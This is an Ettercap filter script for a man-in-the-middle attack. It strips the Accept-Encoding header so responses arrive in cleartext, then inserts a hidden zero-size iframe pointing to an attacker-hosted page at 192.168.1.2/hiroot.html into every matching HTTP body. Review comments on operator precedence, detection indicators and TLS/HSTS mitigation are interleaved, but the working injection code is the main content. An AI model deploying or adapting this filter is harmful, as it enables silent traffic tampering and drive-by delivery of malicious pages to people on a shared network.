# Request path: selects packets by protocol (TCP), destination address (anything
# other than 192.168.1.2) and destination port (80 or 8080).
# NOTE(review): && and || are mixed without grouping. If && binds tighter than ||
# (as in C), the `tcp.dst == 8080` alternative is evaluated on its own, without
# the protocol and address checks -- confirm against the etterfilter parser.
if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.dst == 80 || tcp.dst == 8080) {
#...and if it contains an Accept-Encoding header...
if (search(DATA.data, "Accept-Encoding")) {
#...remove any Encoding (make sure we are using plain text)
# The header name is overwritten with a string of the same length (15 bytes), so
# the payload size is unchanged. The server then sees no Accept-Encoding header
# and an unknown "Accept-Nothing!" header in its place.
# Detection: "Accept-Nothing!" is not a standard HTTP request header, so its
# appearance in web-server, proxy or IDS logs is an indicator that requests were
# rewritten in transit by a filter like this one.
replace("Accept-Encoding", "Accept-Nothing!");
}
}
#--Inject Iframe--
# Response path: selects packets by protocol (TCP), destination address (anything
# other than 192.168.1.2) and source port (80 or 8080). The excluded address is
# the same host the injected iframe points to.
# NOTE(review): && and || are mixed without grouping. If && binds tighter than ||
# (as in C), the `tcp.src == 8080` alternative is evaluated on its own, without
# the protocol and address checks -- confirm against the etterfilter parser.
#
# Mitigation: search()/replace() operate on the packet payload, so they only
# match markup that crosses the wire in cleartext. Pages delivered over TLS
# (with HSTS so clients do not fall back to http://) do not expose a "<body>"
# string to match.
# Detection: a response whose opening body tag is immediately followed by a
# width=0 height=0 iframe that the origin server did not emit, typically
# referencing a host on the local segment, is the visible artifact of this block.
if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.src == 80 || tcp.src == 8080) {
# Lower-case form of the tag; only the exact string "<body>" is matched.
if (search(DATA.data, "<body>")){
#Replace it with the body tag and an iframe to our attacking webpage
# The replacement is longer than the matched string, so the payload grows.
replace("<body>","<body><iframe src='http://192.168.1.2/hiroot.html' width=0 height=0 />");
# msg() reports the event on the operator's side; nothing is shown to the client.
msg("iframe injected after <body>\n");
}
# Upper-case form of the tag; only the exact string "<BODY>" is matched.
if (search(DATA.data, "<BODY>")){
replace("<BODY>","<BODY><IFRAME SRC='http://192.168.1.2/hiroot.html' width=0 height=0 />");
msg("iframe injected after <BODY>\n");
}
}